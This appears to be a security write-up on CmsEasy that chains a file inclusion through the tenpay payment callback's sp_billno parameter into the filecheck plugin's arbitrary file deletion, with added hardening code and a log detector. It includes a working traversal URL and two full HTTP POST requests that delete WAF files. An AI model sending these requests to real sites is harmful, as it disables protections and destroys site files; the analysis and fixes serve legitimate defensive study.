
cmseasy front-end file inclusion

[2018.03.26]

Paired with the injection flaw covered just before this, it allows more advanced chains.

Vulnerable file:

/lib/plugins/pay/tenpay.php

require_once ("tenpay/PayResponseHandler.class.php");

$resHandler = new PayResponseHandler();
$sp_billno = $resHandler->getParameter("sp_billno");
// Blacklist filter: only a few SQL keywords are checked, nothing path-related
if(preg_match('/(select|union|and|ÿ|))/i',$sp_billno)){
    exit('非法参数');
}
// Split the bill number on "-"; the third capture group becomes the plugin name
preg_match_all("/-(.*)-(.*)-(.*)/isu",$sp_billno,$oidout);
$paytype = $where['pay_code'] = $oidout[3][0];
// $paytype flows straight into the include path; only the ".php" suffix is fixed
include_once ROOT.'/lib/plugins/pay/'.$paytype.'.php';


Ignore the earlier part; the three lines that matter are:

$sp_billno = $resHandler->getParameter("sp_billno");
$paytype = $where['pay_code'] = $oidout[3][0];
include_once ROOT.'/lib/plugins/pay/'.$paytype.'.php';


getParameter is a hand-written method, similar to Java's getParameter, for reading a GET value. The value captured in group 3 is assigned to $paytype and then passed straight into include_once. The awkward part is that the suffix is fixed to .php, but that does not hinder exploitation at all.
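For contrast, here is how the $paytype resolution should be written. This is an added example and not CmsEasy's own code: it keeps the same sp_billno split, but accepts the third field only if it is a plain identifier and matches a whitelist built by listing the pay plugin directory, so no traversal string can reach include_once. The plugin directory, its stub files and the function names are constructed for the demo.

```php
<?php
// Added example (not CmsEasy's own code): hardened replacement for the
// $paytype resolution in tenpay.php. The plugin directory layout below is
// constructed for the demo.

declare(strict_types=1);

/**
 * Whitelist of installed payment plugins: base names of the *.php files
 * directly inside $pluginDir (no recursion, no user input involved).
 */
function installedPayPlugins(string $pluginDir): array
{
    $names = [];
    foreach (glob($pluginDir . '/*.php') ?: [] as $path) {
        $names[] = basename($path, '.php');
    }
    return $names;
}

/**
 * Parse sp_billno the way tenpay.php does (third "-" separated field) and
 * return the plugin file path, or null if the value must be rejected.
 */
function resolvePayPlugin(string $spBillno, string $pluginDir): ?string
{
    if (!preg_match_all('/-(.*)-(.*)-(.*)/isu', $spBillno, $m) || !isset($m[3][0])) {
        return null;
    }
    $paytype = $m[3][0];

    // 1. Syntactic check: letters, digits and underscore only. This alone
    //    already rules out "../", "/" and "\".
    if (!preg_match('/^[a-z0-9_]+$/i', $paytype)) {
        return null;
    }
    // 2. Whitelist check: the name must be an actually installed plugin.
    if (!in_array($paytype, installedPayPlugins($pluginDir), true)) {
        return null;
    }
    return $pluginDir . '/' . $paytype . '.php';
}

// --- demo with a constructed plugin directory in the system temp dir ---
$dir = sys_get_temp_dir() . '/cmseasy_pay_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/tenpay.php', "<?php // stub\n");
file_put_contents($dir . '/alipay.php', "<?php // stub\n");

$cases = [
    'xx-xx-xx-tenpay'                      => true,  // legitimate callback
    '1-1-1-../../plugins/filecheck/action' => false, // the traversal from this write-up
    'xx-xx-xx-tenpay/../../../index'       => false, // slash-based traversal
    'xx-xx-xx-paypal'                      => false, // valid identifier, but not installed
];
foreach ($cases as $billno => $expectAllowed) {
    $resolved = resolvePayPlugin($billno, $dir);
    $allowed  = $resolved !== null;
    printf("%-40s => %s\n", $billno, $allowed ? 'include ' . basename($resolved) : 'REJECTED');
    if ($allowed !== $expectAllowed) {
        throw new RuntimeException("unexpected result for $billno");
    }
}

// clean up the constructed directory
array_map('unlink', glob($dir . '/*.php'));
rmdir($dir);
```

The identifier check is what actually closes the inclusion; the whitelist on top of it means a typo or a removed plugin produces a clean rejection instead of an include of whatever file happens to have that name.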


File: /lib/plugins/filecheck/action.php

This file cannot be accessed directly.

But we have a file inclusion in hand here, so, heh.

The file contains a variety of functions, for example:

if ($action == 'file_backup') {
    if (empty($_POST)) {
        // No POST body: list the directories and files under FROOT
        $fileList = GetFileList(FROOT, false, true);
        $file_list = new stdClass();
        $file_list->dirs = $file_list->files = array();
        if (is_array($fileList['dir']))
            foreach ($fileList['dir'] as $dir) {
                if (preg_match(FileBackup::FileNameMath, basename($dir)) > 0)
                    $file_list->dirs[] = basename($dir);
            }
        if (is_array($fileList['file']))
            foreach ($fileList['file'] as $file) {
                if (preg_match(FileBackup::FileNameMath, basename($file)) > 0)
                    $file_list->files[] = basename($file);
            }
    }
    if (count($_POST) > 0) {
        $backup = new stdClass();
        $backup->Success = null;
        //TODO array_walk
        // File names come straight from the POST body
        $files = $_POST['files'];
        if (empty($files) == false) {
            $make = FileCheckData::MakeData($files);
            $backup = FileBackup::BackupFile($files, $make->Time);
        }
    }
    require FDIR . DS . 'view/file_backup.php';
}




File enumeration

elseif ($action == 'trojan_history') {
    if (count($_POST) > 0) {
        //array_walk
        // Only doubled separators are collapsed; the package name is otherwise untouched
        $_POST['package'] = str_replace(DS . DS, DS, $_POST['package']);
        if (isset($_POST['delete'])) {
            TrojanScan::DeletePackage($_POST['package']);
        }
        if (isset($_POST['restore'])) {
            //TrojanScan::RestoreFile($_POST['package'],$_POST['file']);
            TrojanScan::RestorePackageFile($_POST['package'], $_POST['file']);
        }
    }
}

After taking the package name it goes into a delete function:

static function DeletePackage($package)
{
    // $package is appended to FROOT as-is: no basename(), no realpath(), no containment check
    $file = FROOT . DS . $package;
    echo $file;
    if (file_exists($file))
        unlink($file);
}

Arbitrary file deletion.
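What DeletePackage is missing is a containment check. The following is an added example, not CmsEasy's code: it assumes backup packages are flat files in one dedicated backup directory (the directory name and layout are constructed for the demo), resolves the requested name with realpath() and refuses anything that does not land on a regular file inside that directory.

```php
<?php
// Added example (not CmsEasy's own code): containment check for the package
// name before unlink(). The FROOT layout below is constructed for the demo.

declare(strict_types=1);

/**
 * Real path of $package inside $backupDir, or null if the name points
 * anywhere else. $backupDir must already exist.
 */
function safePackagePath(string $backupDir, string $package): ?string
{
    $base = realpath($backupDir);
    if ($base === false) {
        return null;
    }
    // Package names are flat file names. Normalise Windows separators first so
    // "\lib\tool\waf.php" is treated the same as "/lib/tool/waf.php" on Linux.
    $package = str_replace('\\', '/', $package);
    if ($package === '' || strpos($package, '/') !== false) {
        return null;              // no subdirectories, no absolute paths, no traversal
    }
    $real = realpath($base . '/' . $package);
    if ($real === false || !is_file($real)) {
        return null;              // missing, or not a regular file
    }
    // Belt and braces: realpath() follows symlinks, so a link planted in the
    // backup dir that points outside still fails this prefix check.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

/** Hardened stand-in for DeletePackage: true only if a file was removed. */
function deletePackageSafely(string $backupDir, string $package): bool
{
    $path = safePackagePath($backupDir, $package);
    return $path !== null && unlink($path);
}

// --- demo: constructed FROOT with a backup dir and a WAF file outside it ---
$froot = sys_get_temp_dir() . '/cmseasy_froot_demo_' . getmypid();
mkdir($froot . '/lib/tool', 0700, true);
mkdir($froot . '/backups', 0700, true);
file_put_contents($froot . '/lib/tool/waf.php', "<?php // stand-in for the WAF file\n");
file_put_contents($froot . '/backups/pkg-20180326.zip', 'pk');

$attempts = [
    '\\lib\\tool\\waf.php' => false, // the package value from this write-up: refused
    '../lib/tool/waf.php'  => false, // traversal: refused
    'pkg-20180326.zip'     => true,  // legitimate package: deleted
];
foreach ($attempts as $pkg => $expect) {
    $deleted = deletePackageSafely($froot . '/backups', $pkg);
    printf("%-22s => %s\n", $pkg, $deleted ? 'deleted' : 'refused');
    if ($deleted !== $expect) {
        throw new RuntimeException("unexpected result for $pkg");
    }
}
if (!is_file($froot . '/lib/tool/waf.php')) {
    throw new RuntimeException('file outside the backup dir must survive');
}

// clean up the constructed tree
unlink($froot . '/lib/tool/waf.php');
rmdir($froot . '/lib/tool'); rmdir($froot . '/lib');
rmdir($froot . '/backups'); rmdir($froot);
```

Rejecting any separator up front is deliberate: the original code's str_replace(DS . DS, DS, ...) only tidies the string, it never decides whether the path is allowed, and that decision is the whole point.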



This directory is where the information about the packaged files lives.



http://127.0.0.1//cmseasy/index.php?case=archive&act=respond&subject=xx-xx-xx-tenpay&sp_billno=1-1-1-../../plugins/filecheck/action



Deleting the 360 WAF

POST //cmseasy/index.php?case=archive&act=respond&subject=xx-xx-xx-tenpay&sp_billno=1-1-1-../../plugins/filecheck/action&action=trojan_history HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: gzU_msid=tT2FhN;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

&delete=1&package=websca1n360\360safe\360webscan.php




Deleting the self-written WAF rules

POST //cmseasy/index.php?case=archive&act=respond&subject=xx-xx-xx-tenpay&sp_billno=1-1-1-../../plugins/filecheck/action&action=trojan_history HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: gzU_msid=tT2FhN;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

&delete=1&package=\lib\tool\waf.php
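Both requests above share one shape: a pay-callback URL whose sp_billno carries a path instead of a plugin name, with a filecheck action name riding along. That shape is easy to pick out of web server logs. The script below is an added example (not part of the write-up) that runs such a check over constructed Apache-style access-log lines; it decodes the query string once, as PHP does for $_GET, so the same value in percent-encoded form is caught too. The log lines and the function name are made up for the demo.

```php
<?php
// Added example (not from the write-up): detector for the request pattern
// shown above, run over constructed access-log lines. It flags
// (a) an sp_billno whose third "-" field is not a plain plugin name,
// (b) a traversal sequence in sp_billno, and
// (c) a filecheck action name arriving on the pay-callback URL.

declare(strict_types=1);

/** Inspect one access-log line; returns a list of reasons (empty = clean). */
function inspectLogLine(string $line): array
{
    $reasons = [];
    // Request target from the "METHOD target HTTP/x.y" field.
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return $reasons;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return $reasons;
    }
    parse_str($query, $params);   // percent-decodes once, like PHP does for $_GET

    if (isset($params['sp_billno']) && is_string($params['sp_billno'])) {
        $bill = $params['sp_billno'];
        // Same split tenpay.php performs; the third field becomes the include name.
        if (preg_match_all('/-(.*)-(.*)-(.*)/isu', $bill, $g) && isset($g[3][0])
            && !preg_match('/^[a-z0-9_]+$/i', $g[3][0])) {
            $reasons[] = 'sp_billno third field is not a plain plugin name: ' . $g[3][0];
        }
        // Decoded "../" or "..\", or a still-encoded ".." left by double encoding.
        if (preg_match('#\.\.[/\\\\]|%2e%2e#i', $bill)) {
            $reasons[] = 'traversal sequence in sp_billno';
        }
        // filecheck actions have no business on the payment callback URL.
        if (isset($params['action'])
            && in_array($params['action'], ['trojan_history', 'file_backup'], true)) {
            $reasons[] = 'filecheck action "' . $params['action'] . '" via pay callback';
        }
    }
    return $reasons;
}

// Constructed sample lines (not real traffic).
$samples = [
    '127.0.0.1 - - [26/Mar/2018:10:00:00 +0800] "GET /cmseasy/index.php?case=archive&act=respond&subject=xx-xx-xx-tenpay&sp_billno=xx-xx-xx-tenpay HTTP/1.1" 200 512',
    '127.0.0.1 - - [26/Mar/2018:10:00:05 +0800] "POST /cmseasy/index.php?case=archive&act=respond&subject=xx-xx-xx-tenpay&sp_billno=1-1-1-../../plugins/filecheck/action&action=trojan_history HTTP/1.1" 200 77',
    '127.0.0.1 - - [26/Mar/2018:10:00:09 +0800] "GET /cmseasy/index.php?case=archive&act=respond&subject=xx-xx-xx-tenpay&sp_billno=1-1-1-..%2F..%2Fplugins%2Ffilecheck%2Faction HTTP/1.1" 200 77',
];
$expectedReasonCount = [0, 3, 2]; // clean callback; the write-up's request; encoded variant

foreach ($samples as $i => $line) {
    $hits = inspectLogLine($line);
    printf("line %d: %s\n", $i + 1, $hits ? implode('; ', $hits) : 'clean');
    if (count($hits) !== $expectedReasonCount[$i]) {
        throw new RuntimeException('line ' . ($i + 1) . ' produced ' . count($hits) . ' reasons');
    }
}
```

Reason (a) is the one to alert on by itself: a legitimate tenpay callback always carries a bare plugin name in that field, so anything else in it is already outside normal behaviour regardless of which action parameter follows.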



